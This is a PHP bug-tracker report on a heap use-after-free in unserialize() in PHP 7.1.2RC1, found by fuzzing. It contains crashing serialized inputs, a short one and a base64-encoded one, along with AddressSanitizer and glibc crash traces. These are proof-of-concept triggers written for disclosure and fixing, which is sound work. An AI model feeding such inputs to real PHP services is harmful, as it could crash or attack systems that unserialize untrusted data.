|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
[2017-02-15 10:53 UTC] cyoung at tripwire dot com
Description:
------------
Using AFL + ASAN, I have uncovered a UAF read bug in unserialize within zval_get_type().
Apologies for the long test input, but minimizing it with AFL leads to a generic out of mem type condition.
Test script:
---------------
USE_ZEND_ALLOC=0 php -r 'unserialize("O:9:\"Exception\":799999999999999999999999999999999997:{i:0;a:0:{}i:6095700000000000000000062;i:1;i:0;R:2;i:0000000000000000000000000000000000000000000000000000000;R:2;i:10;a:0:{}i:62;i:1;i:0;R:2;i:000000000000000000000000000000000000002;d:031830001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:333000000000000000333333000000000101437080;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+33E+0000302;i:3;d:+.000000000000000033333300000000003333330007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:33333;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.00000000000009190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000001437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:33333;d:+33E+000030200000101437080919028095902517005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+33E+0000302;i:3;d:+.000000000000000033333300000000003333330007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:33333;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000070333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+00000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.00000000000000003333330000000001014005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014378809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.000000000000000033307005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:33;d:3E+0000302;i:3;d:+33E+0000302;i:3;d:+.000000000000000033333300000000003333330007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.00000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000070333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+00000010102517005;i:3;d:33000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517003E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.00000000000000003333330000000001014005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000000101025170302;i:3;d:+.000000000000000033333300000000010143708091902809590217005;i:3;a:7:{i:3;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.000000000000000033333300000000010143703330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00000000000000003333330000000000333333000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:33;d:3333330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+0000703333317005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000809190217005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000S00000101437080919028095902517005;i:3;a:7:{i:3;d:3E+00007005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.00005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+33E+0000302;i:3;d:+.0000000000000000333333000000000033333300000000010102517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3E+000030217005;i:3;a:7:{i:3;d:33333E+0000302;i:3;d:+.0000000000003333330000000001014370809133E+0000302;i:3;d:+.00000000000000003333330000000001014370809190295902517005;i:3;d:3E+0000302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:3;a:7:{i:3;d:3330000000000000003333330000000001014370809190295902517005;i:3;d:3E+0080302;i:3;d:+.0000000000000000333333000000000101437080919028095902517005;i:33;d:3");'
Expected result:
----------------
Some errors should probably be printed about the unserialize data being invalid.
Actual result:
--------------
Without ASAN and with USE_ZEND_ALLOC=0, this is a segfault.
With ASAN and USE_ZEND_ALLOC=0, I get this report:
==15662==ERROR: AddressSanitizer: heap-use-after-free on address 0x61200000e548 at pc 0x000001346ae7 bp 0x7fff688a4a50 sp 0x7fff688a4a48
READ of size 1 at 0x61200000e548 thread T0
#0 0x1346ae6 in zval_get_type /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_types.h:332:9
#1 0x1346ae6 in php_var_unserialize_internal /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:637
#2 0x13481ca in process_nested_data /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:452:8
#3 0x13481ca in object_common2 /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:556
#4 0x1345f03 in php_var_unserialize_internal /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:989:9
#5 0x133e3ba in php_var_unserialize /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var_unserializer.re:584:11
#6 0x130145e in zif_unserialize /home/cyoung/php/afl/php-src-php-7.1.2RC1/ext/standard/var.c:1114:7
#7 0x1831ce2 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_vm_execute.h:675:2
#8 0x16eeff5 in execute_ex /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_vm_execute.h:432:7
#9 0x16efda6 in zend_execute /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_vm_execute.h:474:2
#10 0x15519cd in zend_eval_stringl /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_execute_API.c:1093:4
#11 0x1552343 in zend_eval_stringl_ex /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_execute_API.c:1134:11
#12 0x1552343 in zend_eval_string_ex /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_execute_API.c:1145
#13 0x193b0aa in do_cli /home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php_cli.c:1024:8
#14 0x1938dd4 in main /home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php_cli.c:1381:18
#15 0x7f3c83e0482f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
#16 0x4809c8 in _start (/home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php+0x4809c8)
0x61200000e548 is located 264 bytes inside of 288-byte region [0x61200000e440,0x61200000e560)
freed by thread T0 here:
#0 0x5076b2 in free (/home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php+0x5076b2)
#1 0x14af197 in _efree /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_alloc.c:2428:4
previously allocated by thread T0 here:
#0 0x507992 in __interceptor_malloc (/home/cyoung/php/afl/php-src-php-7.1.2RC1/sapi/cli/php+0x507992)
#1 0x14b03ca in __zend_malloc /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_alloc.c:2820:14
SUMMARY: AddressSanitizer: heap-use-after-free /home/cyoung/php/afl/php-src-php-7.1.2RC1/Zend/zend_types.h:332 zval_get_type
Shadow bytes around the buggy address:
0x0c247fff9c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff9c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff9c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff9c80: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c247fff9c90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c247fff9ca0: fd fd fd fd fd fd fd fd fd[fd]fd fd fa fa fa fa
0x0c247fff9cb0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fff9cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c247fff9cd0: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
0x0c247fff9ce0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fff9cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==15662==ABORTING
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Thu Nov 21 09:01:32 2024 UTC |
It looks like this can also be reproduced with a much more concise test case: O:9:"Exception":799999999999999999999999999997:0i:0;a:0:{}i:2;i:0;i:0;R:2; Also worth mentioning is that UBSAN produces this interesting line while processing the input: ext/standard/var_unserializer.re:345:20: runtime error: signed integer overflow: 7999999999999999999 * 10 cannot be represented in type 'long'Another example of triggering this (or at least a similar) crash slightly differently and without instrumented builds of PHP (but still with USE_ZEND_ALLOC=0): cyoung@Tyrell:~/unserialize/crash_analysis/out$ ~/php/php-src-php-7.1.2RC1/sapi/cli/php -r 'var_dump(unserialize(base64_decode("Tzo5OiJFeGNlcHRpb24iOjc5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5Nzp7aTowO2E6MDp7fWk6NjA7ZDozMDAwMDAwMDAwNjE3MDAyOTU3OUUtMTE4O2k6MjtkOjAwMDMxO2k6MjtkOis5NTcxMzMzMzAwMEUtMDAwMDM1ODtpOjI7ZDo0OTU3MTExRS0wMDAwMzE4O2k6MDYyO2k6MTtpOjA7UjoyO2k6")));' bool(false) *** Error in `/home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php': munmap_chunk(): invalid pointer: 0x000000000235e350 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fb0035d97e5] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x1a8)[0x7fb0035e5ae8] /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php(php_request_shutdown+0x23f)[0x6ac22f] /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php[0x7b5dec] /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php[0x42b50c] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fb003582830] /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php(_start+0x29)[0x42b649] ======= Memory map: ======== 00400000-00c70000 r-xp 00000000 fc:02 1837275 /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php 00e6f000-00ef4000 r--p 0086f000 fc:02 1837275 /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php 00ef4000-00f09000 rw-p 008f4000 fc:02 1837275 /home/cyoung/php/php-src-php-7.1.2RC1/sapi/cli/php 00f09000-00f27000 rw-p 00000000 00:00 0 02227000-02370000 rw-p 00000000 00:00 0 [heap] 7fb000d43000-7fb000d59000 r-xp 00000000 fc:00 549 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fb000d59000-7fb000f58000 ---p 00016000 fc:00 549 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fb000f58000-7fb000f59000 rw-p 00015000 fc:00 549 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fb000f59000-7fb0010cb000 r-xp 00000000 fc:00 4962 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 7fb0010cb000-7fb0012cb000 ---p 00172000 fc:00 4962 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 7fb0012cb000-7fb0012d5000 r--p 00172000 fc:00 4962 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 7fb0012d5000-7fb0012d7000 rw-p 0017c000 fc:00 4962 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 7fb0012d7000-7fb0012db000 rw-p 00000000 00:00 0 7fb0012db000-7fb002b91000 r-xp 00000000 fc:00 21478 /usr/lib/x86_64-linux-gnu/libicudata.so.55.1 7fb002b91000-7fb002d90000 ---p 018b6000 fc:00 21478 /usr/lib/x86_64-linux-gnu/libicudata.so.55.1 7fb002d90000-7fb002d91000 r--p 018b5000 fc:00 21478 /usr/lib/x86_64-linux-gnu/libicudata.so.55.1 7fb002d91000-7fb002d92000 rw-p 018b6000 fc:00 21478 /usr/lib/x86_64-linux-gnu/libicudata.so.55.1 7fb002d92000-7fb002db3000 r-xp 00000000 fc:00 563 /lib/x86_64-linux-gnu/liblzma.so.5.0.0 7fb002db3000-7fb002fb2000 ---p 00021000 fc:00 563 /lib/x86_64-linux-gnu/liblzma.so.5.0.0 7fb002fb2000-7fb002fb3000 r--p 00020000 fc:00 563 /lib/x86_64-linux-gnu/liblzma.so.5.0.0 7fb002fb3000-7fb002fb4000 rw-p 00021000 fc:00 563 /lib/x86_64-linux-gnu/liblzma.so.5.0.0 7fb002fb4000-7fb002fcd000 r-xp 00000000 fc:00 646 /lib/x86_64-linux-gnu/libz.so.1.2.8 7fb002fcd000-7fb0031cc000 ---p 00019000 fc:00 646 /lib/x86_64-linux-gnu/libz.so.1.2.8 7fb0031cc000-7fb0031cd000 r--p 00018000 fc:00 646 /lib/x86_64-linux-gnu/libz.so.1.2.8 7fb0031cd000-7fb0031ce000 rw-p 00019000 fc:00 646 /lib/x86_64-linux-gnu/libz.so.1.2.8 7fb0031ce000-7fb00334d000 r-xp 00000000 fc:00 21474 /usr/lib/x86_64-linux-gnu/libicuuc.so.55.1 7fb00334d000-7fb00354d000 ---p 0017f000 fc:00 21474 /usr/lib/x86_64-linux-gnu/libicuuc.so.55.1 7fb00354d000-7fb00355d000 r--p 0017f000 fc:00 21474 /usr/lib/x86_64-linux-gnu/libicuuc.so.55.1 7fb00355d000-7fb00355e000 rw-p 0018f000 fc:00 21474 /usr/lib/x86_64-linux-gnu/libicuuc.so.55.1 7fb00355e000-7fb003562000 rw-p 00000000 00:00 0 7fb003562000-7fb003721000 r-xp 00000000 fc:00 25684 /lib/x86_64-linux-gnu/libc-2.23.so 7fb003721000-7fb003921000 ---p 001bf000 fc:00 25684 /lib/x86_64-linux-gnu/libc-2.23.so 7fb003921000-7fb003925000 r--p 001bf000 fc:00 25684 /lib/x86_64-linux-gnu/libc-2.23.so 7fb003925000-7fb003927000 rw-p 001c3000 fc:00 25684 /lib/x86_64-linux-gnu/libc-2.23.so 7fb003927000-7fb00392b000 rw-p 00000000 00:00 0 7fb00392b000-7fb003ada000 r-xp 00000000 fc:00 21488 /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.3 7fb003ada000-7fb003cda000 ---p 001af000 fc:00 21488 /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.3 7fb003cda000-7fb003ce2000 r--p 001af000 fc:00 21488 /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.3 7fb003ce2000-7fb003ce4000 rw-p 001b7000 fc:00 21488 /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.3 7fb003ce4000-7fb003ce5000 rw-p 00000000 00:00 0 7fb003ce5000-7fb003ce8000 r-xp 00000000 fc:00 25683 /lib/x86_64-linux-gnu/libdl-2.23.so 7fb003ce8000-7fb003ee7000 ---p 00003000 fc:00 25683 /lib/x86_64-linux-gnu/libdl-2.23.so 7fb003ee7000-7fb003ee8000 r--p 00002000 fc:00 25683 /lib/x86_64-linux-gnu/libdl-2.23.so 7fb003ee8000-7fb003ee9000 rw-p 00003000 fc:00 25683 /lib/x86_64-linux-gnu/libdl-2.23.so 7fb003ee9000-7fb003ff1000 r-xp 00000000 fc:00 25691 /lib/x86_64-linux-gnu/libm-2.23.so 7fb003ff1000-7fb0041f0000 ---p 00108000 fc:00 25691 /lib/x86_64-linux-gnu/libm-2.23.so 7fb0041f0000-7fb0041f1000 r--p 00107000 fc:00 25691 /lib/x86_64-linux-gnu/libm-2.23.so 7fb0041f1000-7fb0041f2000 rw-p 00108000 fc:00 25691 /lib/x86_64-linux-gnu/libm-2.23.so 7fb0041f2000-7fb004209000 r-xp 00000000 fc:00 89638 /lib/x86_64-linux-gnu/libresolv-2.23.so 7fb004209000-7fb004409000 ---p 00017000 fc:00 89638 /lib/x86_64-linux-gnu/libresolv-2.23.so 7fb004409000-7fb00440a000 r--p 00017000 fc:00 89638 /lib/x86_64-linux-gnu/libresolv-2.23.so 7fb00440a000-7fb00440b000 rw-p 00018000 fc:00 89638 /lib/x86_64-linux-gnu/libresolv-2.23.so 7fb00440b000-7fb00440d000 rw-p 00000000 00:00 0 7fb00440d000-7fb004433000 r-xp 00000000 fc:00 25673 /lib/x86_64-linux-gnu/ld-2.23.so 7fb004504000-7fb0045c9000 rw-p 00000000 00:00 0 7fb0045c9000-7fb004617000 r--p 00000000 fc:00 522423 /usr/lib/locale/sd_IN@devanagari/LC_CTYPE 7fb004617000-7fb00461f000 rw-p 00000000 00:00 0 7fb004628000-7fb004629000 rw-p 00000000 00:00 0 7fb004629000-7fb004630000 r--s 00000000 fc:00 25518 /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache 7fb004630000-7fb004632000 rw-p 00000000 00:00 0 7fb004632000-7fb004633000 r--p 00025000 fc:00 25673 /lib/x86_64-linux-gnu/ld-2.23.so 7fb004633000-7fb004634000 rw-p 00026000 fc:00 25673 /lib/x86_64-linux-gnu/ld-2.23.so 7fb004634000-7fb004635000 rw-p 00000000 00:00 0 7ffcbdd36000-7ffcbdd57000 rw-p 00000000 00:00 0 [stack] 7ffcbddf8000-7ffcbddfa000 r--p 00000000 00:00 0 [vvar] 7ffcbddfa000-7ffcbddfc000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Aborted